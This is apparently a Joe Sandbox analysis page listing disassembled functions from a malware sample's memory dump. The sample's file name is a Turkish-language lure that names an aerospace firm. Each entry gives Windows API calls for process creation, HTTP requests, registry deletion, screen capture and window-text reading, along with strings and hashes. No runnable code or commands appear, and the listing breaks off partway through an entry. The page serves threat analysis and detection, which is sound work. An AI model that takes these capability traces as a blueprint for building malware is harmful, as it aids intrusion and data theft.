String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#%
API String ID: 221274066-994965530
Opcode ID: ad7a1a64adb3b9b02b1ade43f72ce423a1a0f9d5df51fe384fc59167a188c36e
Instruction ID: 45293c142d71dea6fccd92c0e40de30787bd2ab616538e1676374dbff927cdbe
Opcode Fuzzy Hash: ad7a1a64adb3b9b02b1ade43f72ce423a1a0f9d5df51fe384fc59167a188c36e
Instruction Fuzzy Hash: 09619E71108301AFD705EF64DC89DAFBBE8EFA9350F10092EF595931A0DB309A58CB92

Function 0020AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0020B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0020B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0020B1D4
_wcslen.LIBCMT ref: 0020B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0020B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0020B236
_wcslen.LIBCMT ref: 0020B332

Part of subcall function 001F05A7: GetStdHandle.KERNEL32(000000F6), ref: 001F05C6

_wcslen.LIBCMT ref: 0020B34B
_wcslen.LIBCMT ref: 0020B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0020B3B6
GetLastError.KERNEL32(00000000), ref: 0020B407
CloseHandle.KERNEL32(?), ref: 0020B439
CloseHandle.KERNEL32(00000000), ref: 0020B44A
CloseHandle.KERNEL32(00000000), ref: 0020B45C
CloseHandle.KERNEL32(00000000), ref: 0020B46E
CloseHandle.KERNEL32(?), ref: 0020B4E3

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 4a08fdcd75ca52f9746f9835f7836e4d95ff976cf1044a570efebf32a4b7b3a3
Instruction ID: a105c23cc427cdc9e9757825b6cbeb58547d973be5dc54e78fe69d48c16a0a49
Opcode Fuzzy Hash: 4a08fdcd75ca52f9746f9835f7836e4d95ff976cf1044a570efebf32a4b7b3a3
Instruction Fuzzy Hash: DFF1AC316183419FCB25EF24C891B6EBBE1AF95314F24845DF8998B2E2DB31ED50CB52

Function 0018326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00251990), ref: 001C2F8D
GetMenuItemCount.USER32(00251990), ref: 001C303D
GetCursorPos.USER32(?), ref: 001C3081
SetForegroundWindow.USER32(00000000), ref: 001C308A
TrackPopupMenuEx.USER32(00251990,00000000,?,00000000,00000000,00000000), ref: 001C309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001C30A9

Strings

0, xrefs: 0018327D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: c5156fada7a864875d3edb62cf9e41c15d7a98435db9df3220c5bd86c225b78b
Instruction ID: ba2a10c72d03c9c0859e3fe1bba9dfbe9518cd95e74c7e33aad3fb06e64fc2e2
Opcode Fuzzy Hash: c5156fada7a864875d3edb62cf9e41c15d7a98435db9df3220c5bd86c225b78b
Instruction Fuzzy Hash: 97715C71644209BFEB259F68DC49FAABF65FF21724F24421AF524661E0C7B1ED10CB90

Function 00216CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00216DEB

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00216E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00216E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00216E94
DestroyWindow.USER32(?), ref: 00216EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00180000,00000000), ref: 00216EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00216EFD
GetDesktopWindow.USER32 ref: 00216F16
GetWindowRect.USER32(00000000), ref: 00216F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00216F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00216F4D

Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952

Strings

0, xrefs: 00216D98
tooltips_class32, xrefs: 00216E58, 00216EDD

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 336d181263bf777b0b35a37016be3c012439d27c6f9075c5b07ed5c6e4956774
Instruction ID: c39040d99a0b494feffe4b2fa9579947b88ce4ef2baccd61ded519331f0cd259
Opcode Fuzzy Hash: 336d181263bf777b0b35a37016be3c012439d27c6f9075c5b07ed5c6e4956774
Instruction Fuzzy Hash: 19719774240341AFDB24CF18EC48FAABBE9FBA8304F14451DF99987260CB70E966CB11

Function 001FC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001FC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001FC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001FC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001FC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001FC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001FC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001FC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001FC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001FC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001FC5F0
InternetCloseHandle.WININET(00000000), ref: 001FC5FB

Strings

, xrefs: 001FC575

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: d4f9c6050cc50270ec8de1c6945ef338fe84f7b8f78a3e63492067aa829005b0
Instruction ID: f2ec06b17060f192951cbc5af4971b83ec88fe1ae722564a5fac36835d8cc7f9
Opcode Fuzzy Hash: d4f9c6050cc50270ec8de1c6945ef338fe84f7b8f78a3e63492067aa829005b0
Instruction Fuzzy Hash: 0E516FB464020DBFDB218F60DA48ABB7BBCFF18354F14841AFA4596250DB71E905EBA0

Function 0021856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00218592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185BA
GlobalLock.KERNEL32(00000000), ref: 002185C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185D7
GlobalUnlock.KERNEL32(00000000), ref: 002185E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 002185F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0021FC38,?), ref: 00218611
GlobalFree.KERNEL32(00000000), ref: 00218621
GetObjectW.GDI32(?,00000018,?), ref: 00218641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00218671
DeleteObject.GDI32(?), ref: 00218699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002186AF

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: b1c46a980bffd8c73c26fb4d78dc226c6fc483506f5fe9c134450d2299141fc5
Instruction ID: 5967bc62277b47ec1f826173aba58d5ff78994fcee9d92b6cb573fe2b628fc28
Opcode Fuzzy Hash: b1c46a980bffd8c73c26fb4d78dc226c6fc483506f5fe9c134450d2299141fc5
Instruction Fuzzy Hash: 08412975640209BFDB119FA5DC8CEEA7BBDEFA9711F208058F909E7260DB709941CB60

Function 001F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 001F1502
VariantCopy.OLEAUT32(?,?), ref: 001F150B
VariantClear.OLEAUT32(?), ref: 001F1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001F15FB
VarR8FromDec.OLEAUT32(?,?), ref: 001F1657
VariantInit.OLEAUT32(?), ref: 001F1708
SysFreeString.OLEAUT32(?), ref: 001F178C
VariantClear.OLEAUT32(?), ref: 001F17D8
VariantClear.OLEAUT32(?), ref: 001F17E7
VariantInit.OLEAUT32(00000000), ref: 001F1823

Strings

Default, xrefs: 001F16AF
%4d%02d%02d%02d%02d%02d, xrefs: 001F1625

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 0a978235e6295f0901362e30123ac5ec81cd5a720948f03ccc5c11068231c12f
Instruction ID: 9cb525bc52b43a8dad2b85dc8f14fecfa4023daed9f22e43f2848abfa881eab9
Opcode Fuzzy Hash: 0a978235e6295f0901362e30123ac5ec81cd5a720948f03ccc5c11068231c12f
Instruction Fuzzy Hash: 88D12531A00119FBDF08AF65E885BBDB7B6BF46700F25805AF606AB190DB30DD45DBA1

Function 0020B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Part of subcall function 0020C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0020B6AE,?,?), ref: 0020C9B5
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020C9F1
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA68
Part of subcall function 0020C998: _wcslen.LIBCMT ref: 0020CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0020B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0020B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0020B80A
RegCloseKey.ADVAPI32(?), ref: 0020B87E
RegCloseKey.ADVAPI32(?), ref: 0020B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0020B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0020B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0020B922
FreeLibrary.KERNEL32(00000000), ref: 0020B983
RegCloseKey.ADVAPI32(00000000), ref: 0020B994

Strings

advapi32.dll, xrefs: 0020B8ED
RegDeleteKeyExW, xrefs: 0020B8FE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: d4c35134d33d42daafd89b73eebea1e50a039801430607d4d032b7d573a4a8ba
Instruction ID: dfdf8eeb91e4c735b6d8626a672ec3fef6ed1df093a590e21f1fc29df42d9f9d
Opcode Fuzzy Hash: d4c35134d33d42daafd89b73eebea1e50a039801430607d4d032b7d573a4a8ba
Instruction Fuzzy Hash: C7C18A35218302AFD725DF14C494F2ABBE5BF94308F14849CE59A8B2A3CB71E955CF91

Function 0020255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002025D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002025E8
CreateCompatibleDC.GDI32(?), ref: 002025F4
SelectObject.GDI32(00000000,?), ref: 00202601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0020266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002026AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002026D0
SelectObject.GDI32(?,?), ref: 002026D8
DeleteObject.GDI32(?), ref: 002026E1
DeleteDC.GDI32(?), ref: 002026E8
ReleaseDC.USER32(00000000,?), ref: 002026F3

Strings

(, xrefs: 0020268D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 17ddfc7c7c4ab80911fe94317fe62c22ef78c3016b60fb39c4e2e561fa65af8e
Instruction ID: b5e10b7f2ede09df46fb34f2ac0af6ea5f6767728dcfa43a6569eb74490df0b2
Opcode Fuzzy Hash: 17ddfc7c7c4ab80911fe94317fe62c22ef78c3016b60fb39c4e2e561fa65af8e
Instruction Fuzzy Hash: 5C610275D00219EFCF04CFA4D888AAEBBFAFF58310F20852AE959A7251D771A951CF50

Function 001BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001BDAA1

Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD659
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD66B
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD67D
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD68F
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6A1
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6B3
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6C5
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6D7
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6E9
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD6FB
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD70D
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD71F
Part of subcall function 001BD63C: _free.LIBCMT ref: 001BD731

_free.LIBCMT ref: 001BDA96

Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0

_free.LIBCMT ref: 001BDAB8
_free.LIBCMT ref: 001BDACD
_free.LIBCMT ref: 001BDAD8
_free.LIBCMT ref: 001BDAFA
_free.LIBCMT ref: 001BDB0D
_free.LIBCMT ref: 001BDB1B
_free.LIBCMT ref: 001BDB26
_free.LIBCMT ref: 001BDB5E
_free.LIBCMT ref: 001BDB65
_free.LIBCMT ref: 001BDB82
_free.LIBCMT ref: 001BDB9A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2506890613cefe0fd7e86e2b32bfddb77c3ff535229fe89bbfdfd801576766d7
Instruction ID: 61aa21f5c36768ca324d30c463d2f5b4b14fa69f3eec5e8602c4c412e200d1e3
Opcode Fuzzy Hash: 2506890613cefe0fd7e86e2b32bfddb77c3ff535229fe89bbfdfd801576766d7
Instruction Fuzzy Hash: 8C315C31604305AFEB29AA39E945BDAB7E9FF21314F154829F449D7191EF31EC44CB24

Function 001E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 001E369C
_wcslen.LIBCMT ref: 001E36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001E3797
GetClassNameW.USER32(?,?,00000400), ref: 001E380C
GetDlgCtrlID.USER32(?), ref: 001E385D
GetWindowRect.USER32(?,?), ref: 001E3882
GetParent.USER32(?), ref: 001E38A0
ScreenToClient.USER32(00000000), ref: 001E38A7
GetClassNameW.USER32(?,?,00000100), ref: 001E3921
GetWindowTextW.USER32(?,?,00000400), ref: 001E395D

Strings

%s%u, xrefs: 001E3734

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 6688c4a8ad8f8dacd3bcccc3dd3866575003948f436718e2d586da6ad3d2dc06
Instruction ID: e4c273642f67ce6e1655dfa12f2e568dce20ce5d111263bdf660edb1596b2555
Opcode Fuzzy Hash: 6688c4a8ad8f8dacd3bcccc3dd3866575003948f436718e2d586da6ad3d2dc06
Instruction Fuzzy Hash: 3391A271204A46AFD718DF25C889FEEF7A8FF54314F008629F9A983191DB30AA45CB91

Function 001E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 001E4994
GetWindowTextW.USER32(?,?,00000400), ref: 001E49DA
_wcslen.LIBCMT ref: 001E49EB
CharUpperBuffW.USER32(?,00000000), ref: 001E49F7
_wcsstr.LIBVCRUNTIME ref: 001E4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 001E4A64
GetWindowTextW.USER32(?,?,00000400), ref: 001E4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 001E4AE6
GetClassNameW.USER32(?,?,00000400), ref: 001E4B20
GetWindowRect.USER32(?,?), ref: 001E4B8B

Strings

ThumbnailClass, xrefs: 001E4A6F, 001E4AF1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 4597c66e7a22a321adfa7b8c4269c956180b050233ff4be0a4adeeddda41db49
Instruction ID: 1cdf42723799dc37f6ee4cf9ef1b29f07e75ecb39ed679fcdcad12d5bc0ada0d
Opcode Fuzzy Hash: 4597c66e7a22a321adfa7b8c4269c956180b050233ff4be0a4adeeddda41db49
Instruction Fuzzy Hash: A591DD310086859FDB04CF16D985BAEB7E9FF94314F04846AFD869B096DB30ED45CBA1

Function 00218D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00218D5A
GetFocus.USER32 ref: 00218D6A
GetDlgCtrlID.USER32(00000000), ref: 00218D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00218E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00218ECF
GetMenuItemCount.USER32(?), ref: 00218EEC
GetMenuItemID.USER32(?,00000000), ref: 00218EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00218F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00218F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00218FA1

Strings

0, xrefs: 00218E9F

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: fb1ece1f6529b26449e14feb80e437a25efa45d38ca15e2b3d66a218c12e457f
Instruction ID: f28f714ebbe46dd1c4f80de6b0862eab5177ef6c67f5637d1f75b087e1b56934
